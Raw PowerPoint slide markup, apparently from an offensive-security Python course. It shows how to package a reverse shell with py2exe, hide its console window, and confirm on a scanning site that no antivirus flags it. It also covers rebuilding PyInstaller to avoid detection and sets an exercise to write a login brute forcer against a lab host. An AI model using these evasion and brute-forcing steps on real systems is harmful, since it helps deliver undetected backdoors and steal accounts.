          <p:cNvPr id="6" name="Picture 5" descr="Graphical user interface, text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A237895F-D30F-42E4-840D-DC203A409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762" y="4510162"/>
            <a:ext cx="7866649" cy="2258589"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21120795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157</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1" y="1870923"/>
            <a:ext cx="9656396"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run the executable (we only care about </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>myscript.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>), we get a reverse shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Graphical user interface, text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23029C8A-61E6-4886-B898-684F71138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79" y="2604241"/>
            <a:ext cx="6936958" cy="3751267"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20338775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158</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1" y="1870923"/>
            <a:ext cx="3925354" cy="1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now, it’s time to scan the output to see if it gets detected by any AV. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We will use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>antiscan.me</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We can see that our reverse shell is only flagged by one AV. This is a good progress.</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83A08DFD-F875-4170-AC9B-7476C56841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319" y="826169"/>
            <a:ext cx="4407823" cy="6003758"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4524794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159</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646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>However, the script is run as a console application (which displays some errors without affecting our reverse shell):</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="A screenshot of a computer&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02DF4D6E-E786-4641-8DD7-6BD0E647D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93" y="2517253"/>
            <a:ext cx="9540222" cy="3005241"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C26E6A7-5C33-4363-9EB2-FEED5EAB7E39}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="987540" y="5845354"/>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Can we hide this from appearing?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="241683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 Creating a brute forcer</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725078" y="3151397"/>
            <a:ext cx="10137507" cy="230832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&gt;&gt;&gt; s = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>requests.Session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s.get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token = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>res.text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token_index</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:].split(</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res = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>s.post</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"http://172.16.238.100/login"</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data</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"_token"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: token,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"email"</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khalid@omani.cloud</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"password"</a:t>
            </a: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"hello123"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>})</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;&gt;&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"Sign Out"</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res.text</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="D4D4D4"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>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9BEB6859-F88A-4EC7-A3E0-726E4CAB3DCC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1069024" y="1799517"/>
            <a:ext cx="1061765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will develop a simple brute forcer that brute force PCPAPP credentials and shows valid ones.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can take advantage of this code snippet for our brute forcer logic:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6934D54-C408-4B48-8442-BF385C23955F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1069024" y="5698777"/>
            <a:ext cx="9460831" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Our brute forcer will take an email and a file that contains passwords that will be used to log in.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C091AA2-6A71-402A-9FCE-C01628295F8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3932540" y="6208113"/>
            <a:ext cx="6096000" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Can you complete the brute forcer? </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B38B2B7D-5A25-443F-874A-73837B803892}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="80047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160</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try to improve our </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>setup.py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to instruct py2exe to hide the console window:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC2F5ABC-D0B4-4FFF-BEE5-9BC4B826BCF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1483898" y="2618671"/>
            <a:ext cx="9821776"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setuptools</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setup</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py2exe, sys</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sys.argv.append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'py2exe'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setup(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>windows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'myscript.py'</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options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'py2exe'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'bundle_files'</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'compressed'</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zipfile</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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D94B727-17E3-48F3-877E-0AD4893B7CF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1604212" y="4537456"/>
            <a:ext cx="9950113" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: this will create a “GUI” executable. Since our script does not have a GUI interface, this will not show any window and will run in the background.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We can run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>setup.py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (without py2exe as arg1): </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C88F6CAF-6056-4C13-90F3-961CF6E7EBB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2093498" y="5551923"/>
            <a:ext cx="9821776"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C:\Users\user\Desktop\test\py2exe&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>python .\setup.py</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>running py2exe</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Building '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\myscript.exe'.</a:t>
            </a:r>
          </a:p>
          <a:p>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685800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161</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run the executable, we get a shell as expected!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B5591EB-4F50-4511-A29B-C0220A31B9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788" y="2305300"/>
            <a:ext cx="5781675" cy="3971925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09DD7AE9-9D5C-4777-9639-E940F30EAA52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="987540" y="2418872"/>
            <a:ext cx="4077755" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Also, there will be no console window this time!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1AFB5A7-5609-4194-BEBA-4407F81B8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84" y="3243820"/>
            <a:ext cx="5351499" cy="518054"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4178916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Py2exe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162</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Now, if we try to scan our new executable:</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FF408775-13F9-4562-8846-0163E2AA0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550" y="926431"/>
            <a:ext cx="4275322" cy="5823284"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8208475B-01A8-4D82-B68E-0F6CEB6D08EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="987540" y="4707994"/>
            <a:ext cx="6128084" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Great! No AV has detected our reverse shell!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24715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err="1"/>
              <a:t>Pyinstaller</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0"/>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163</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1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Py2exe supports compiling files to exe only. However, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>PyInstaller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> supports compiling python files into several formats including ELF (for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-based OS) and PE (Windows) as well as other formats.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If we install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Pyinstaller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> package directly through pip, our compiled script binary might get flagged “due to some AV vendors having signatures of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Pyinstaller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> pre-compiled binaries”.</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CC4D92DE-3216-4383-B2C5-9D7FAABAC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7587" y="3741320"/>
            <a:ext cx="4381500" cy="2343150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31068867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err="1"/>
              <a:t>Pyinstaller</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164</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1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Once downloaded, we will need to download and install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>MSVC compiler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, which is included when you download Visual Studio with C++ community version.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Once downloaded and installed, we can proceed further to compile </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PyInstaller</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
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{669BEE83-D4FF-469A-8CF3-0691CFCC4C9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1716508" y="2924974"/>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C:\Users\user\Downloads\pyinstaller-4.7\bootloader&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>python ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>waf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> all</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A18E0B1D-C7AB-4D28-9E84-E142C49939CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="987540" y="3493708"/>
            <a:ext cx="7542849"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the building finishes, we can proceed further to install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PyInstaller</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
